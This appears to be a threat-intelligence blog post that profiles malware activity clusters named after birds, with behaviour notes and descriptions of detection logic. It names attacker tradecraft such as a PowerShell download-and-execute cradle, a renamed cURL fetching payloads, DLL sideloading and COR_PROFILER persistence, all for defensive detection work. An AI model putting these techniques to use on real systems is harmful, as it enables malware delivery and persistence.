You may have noticed some unusual names in Red Canary’s reporting; when our Intelligence team encounters a cluster of activity that does not match any known threats we are tracking, we use a naming convention inspired by Red Canary’s own name: color + bird. We choose the various colors and bird species with help from our resident birdwatchers, who make connections based on ornithological behavior similarities. We’re partial to alliteration.

In this new and handy field guide, we’ve rounded up the most interesting activity clusters we’ve named and tracked over the last few years, including some endangered species we haven’t seen in a while.

Key

• First observed: Date we started tracking the activity cluster
• Release date: Date we released the threat profile to customers
• Last observed: Date of the last time the threat was seen (as of December 31, 2024)

Tangerine Turkey

Field notes

Tangerine Turkey is an activity cluster characterized by a Visual Basic Script (VBScript) worm delivering a cryptomining payload, typically via infected USB. The VBScript file name typically begins with the letter x followed by six digits, for example x644291.vbs. A CMD child process from wscript.exe then executes a BAT file with a similar naming convention and creates a folder named C:\Windows \System32 (note the space after Windows). The worm then makes a copy of the legitimate printui.exe from C:\Windows\System32 to the newly created C:\Windows \System32 folder, as well as a malicious DLL named printui.dll as a sideloaded DLL hijack.

Sightings

•  Intelligence Insights: January 2025
• Tangerine Turkey mines cryptocurrency in global campaign
• Tangerine Turkey: The USB worm that mines crypto

Detection for birders

The following pseudo-detection analytic identifies instances of printui.exe relocated outside of Windows\System32.

Amber Albatross

Field notes

Amber Albatross, our fifth most prevalent threat of 2024, is an activity cluster characterized by certain potentially unwanted programs (PUP) delivering a setup file and stealer payload. A complex installation chain with obfuscation and anti-analysis techniques eventually leads to unpacking a Pyarmor-obfuscated pyInstaller that is launched via cmd.exe and powershell.exe, before initiating a sequence of reconnaissance commands similar to those used by many stealers.

Sightings

• Intelligence Insights: July 2024
• Intelligence Insights: August 2024
• Intelligence Insights: October 2024
• Intelligence Insights: November 2024
• Intelligence Insights: December 2024

Detection for birders

The following pseudo-detection analytic looks for PowerShell processes executing binaries from the temp directory that do not have a file extension.

Saffron Starling

Field notes

Saffron Starling is an activity cluster that downloads and delivers malicious payloads following a phishing attempt. Specifically, the loader is delivered via ZIP archives containing JScript or VBScript. When executed, the scripts create a renamed copy of cURL and download the subsequent payload, which include Danabot, DarkGate, or Matanbuchus malware. In some cases, a PDF file is downloaded and presented to the user in order to distract from payload deployment.

Sightings

• Drop It Like It’s Qbot (BSidesRemix): Detecting initial execution earlier with OSINT

Detection for birders

The following pseudo-detection analytic identifies renamed instances of cURL. See our blog on profiling executable metadata for additional guidance on how to implement the following detector idea.

Scarlet Goldfinch

Field notes

Scarlet Goldfinch, our third most prevalent threat of 2024, is an activity cluster that lures unsuspecting victims to download a malicious browser update, similar to SocGholish and other fake update threats. To get access to systems, Scarlet Goldfinch redirects users from compromised sites that contain injected JScript code to a site that prompts victims to download a fake update to their internet browser. The download contains the first-stage JScript that is executed via wscript.exe. Upon execution, the JScript downloads an additional payload, which has consistently been NetSupport Manager.

Sightings

• Scarlet Goldfinch: Taking flight with NetSupport Manager

Other names

• HANEYMANEY
• SmartApeSG
• ZPHP

Detection for birders

The following pseudo-detection analytic looks for execution of NetSupport Manager from a non-standard directory (i.e. somewhere other than the Program Files directory).

Lilac Lyrebird

Field notes

Lilac Lyrebird is an activity cluster associated with search engine optimization (SEO) poisoning and malvertising. It leads to a technical support scam that tricks users into giving the operator access to their machine via LogMeIn. Once the adversary gains access, they use PowerShell to download a malicious batch file that is executed via the creation of a scheduled task.

Sightings

• Intelligence Insights: May 2023

Detection for birders

The following pseudo-detection analytic looks for instances of PowerShell using iex(New-Object Net.WebClient).DownloadString to download files hosted remotely. Note that you will need to tune this for your environment.

Charcoal Stork

Field notes

Charcoal Stork is an activity cluster involving a suspected pay-per-install content provider that relies on malvertising to deliver installers. These installers masquerade as anything from cracked games to wallpaper, and their goal is to install malicious payloads. Early Charcoal Stork campaigns delivered ChromeLoader and SmashJacker, where sightings in 2023 delivered more concerning malware such as VileRAT, a Python remote access trojan (RAT) that is reportedly uniquely used by a cyber mercenary group called DeathStalker. Files associated with Charcoal Stork have a default filename of install.exe or Your File Is Ready to Download. We primarily distinguish Charcoal Stork activity from follow-on activity through installer file names and hashes.

Sightings

• Intelligence Insights: September 2023
• The rise of Charcoal Stork
• Charcoal Stork – Red Canary Threat Detection Report

Detection for birders

Look for tactics, techniques, and procedures consistent with known payloads of Charcoal Stork, including ChromeLoader and SmashJacker.

Other filenames we have seen in the wild include:

• 1680x1050 european robin garden inhabitant_ rob___.msi
• 22621.1778.230511-2102.ni_release_svc_prod3_windowssdk.iso
• z7550_97650_syr-2023.32-sspsy-20230802.2023_0821.6.iso
• download.iso
• download (1).iso
• browse fmovies.iso
• file_ elden.ring.deluxe.edition.v1.03.3.zip.tor....iso
• sing 2_ ¡ven y canta de nuevo! (2021).iso

Raspberry Robin

Field notes

Raspberry Robin is an activity cluster involving a worm, possibly installed via USB drive, that may be related to ransomware. This activity cluster uses msiexec.exe to call out to infrastructure, typically compromised QNAP devices, using HTTP requests that contain user and device names of the victim. This has led to the downloading and execution of malicious DLL files.

Sightings

• Raspberry Robin gets the worm early
• Raspberry Robin – Red Canary Threat Detection Report
• Emulating Raspberry Robin using Atomic Red Team

Other names

• QNAP Worm

Detection for birders

The following pseudo-detection analytic looks for msiexec.exe making outbound network connections to download and install packages in the command-line interface allows for the opportunity to examine the activity and determine if it’s malicious or not.

Mango Parakeet

Field notes

Mango Parakeet is an activity cluster characterized by subtle masquerading techniques, such as naming malicious binaries svcnost.exe to mimic svchost.exe, renaming wscript.exe to execute malicious JS files, using rudimentary homograph spoofing such as replacing a lower-case l with a capital I, and extending spacing between the malicious executable’s name and extension. Mango Parakeet is often observed spreading malicious worms via USB flash drives. During execution, Mango Parakeet uses cmd.exe to launch batch scripts to create malicious executables, JavaScript, and DLL files on a target system. It then launches the malicious JavaScript file using a renamed instance of wscript.exe.

Detection for birders

The following pseudo-detection analytic looks for Windows Script Host (wscript.exe) running from an unexpected directory.

Yellow Cockatoo

Field notes

Yellow Cockatoo is an activity cluster that is characterized by search engine redirects eventually leading to the in-memory execution of a .NET remote access trojan (RAT). Yellow Cockatoo’s malware has the capability to drop additional payloads and use encoded PowerShell to steal browser information. Interestingly, this bird is known to “fly south for the winter,” in that it takes breaks after researchers publish information about its operations, resuming activity months later after retooling.

Sightings

• Yellow Cockatoo: Search engine redirects, in-memory remote access trojan, and more

Other names

• Jupyter Infostealer
• Polazert
• Solarmarker

Detection for birders

The following pseudo-detection analytic looks for persistence mechanisms in multiple threats related to startup folder persistence.

Silver Toucan

Field notes

Silver Toucan is an activity cluster that uses signed macOS malware to deploy payloads such as AdLoad, often for ad fraud and other monetization activities. Silver Toucan discloses its own terms of service stating that victim hosts may be used for proxy activities. This cluster requires user interaction with an Apple Disk Image File (DMG) or macOS Installer File (PKG). Once executed, Silver Toucan establishes persistence using macOS LaunchAgents. The cluster uses the cURL utility to conduct command and control (C2) operations, log installation and update progress, and to receive bash commands to download and execute additional files. In some cases, Silver Toucan delivers AdLoad malware as a payload.

Sightings

• How to thwart application bundle manipulation on macOS

Other names

• UpdateAgent

Detection for birders

The following pseudo-detection analytic looks for a shell process executing a file downloaded using the curl utility.

Endangered species

Coral Crane

Field notes

Coral Crane is an activity cluster that uses ISO images containing malicious VBScript code followed by obfuscated PowerShell commands to filelessly download and execute payloads such as AsyncRAT. The activity cluster uses simple obfuscation through string replacement in PowerShell commands to deobfuscate code prior to execution.

Sightings

• Intelligence Insights: February 2022

Detection for birders

The following pseudo-detection analytic looks for wscript.exe spawning PowerShell that uses Invoke-Expression or one of its aliases.

Silver Sparrow

Field notes

Silver Sparrow is an activity cluster with infrastructure designed to deliver malware to macOS systems. It leverages AWS S3 buckets to stage macOS PKG files with names like update.pkg or updater.pkg. During execution, the malware executes JavaScript to orchestrate the creation of files and scripts for persistent execution, attempting to download updated payloads from additional S3 buckets every hour. There are specialized variants of Silver Sparrow for the x86_64 and the Apple M1 ARM64 architectures, implying that the malware was intended specifically for newer macOS systems.

Sightings

• Silver Sparrow macOS malware with M1 compatibility
• Silver Sparrow – Red Canary Threat Detection Report

Detection for birders

The following pseudo-detection analytic looks for use of the plistbuddy command, a built-in tool in macOS that allows administrators to manipulate property lists, or plist, files used to configure various parts of the macOS operating system.

Blue Mockingbird

Field notes

Blue Mockingbird is an activity cluster that deploys a DLL version of XMRig on Windows systems. Tracked publicly since August 2020, the threat achieves initial access by exploiting public-facing applications, eventually establishing persistence by using the COR_PROFILER environment variable to hijack execution flow, task scheduling, or service installation. To execute, Blue Mockingbird either registers the DLL with regsvr32.exe or executes using rundll32.exe. Ultimately, the cluster tries to use system resources to mine cryptocurrency, specifically referring to Monero wallet addresses.

Sightings

• Introducing Blue Mockingbird
• Keeping tabs on the Blue Mockingbird Monero miner
• Blue Mockingbird activity mines Monero cryptocurrency

Detection for birders

The following pseudo-detection analytic looks for wmic.exe manipulating the COR_PROFILER environment variable to establish persistence and bypass UAC.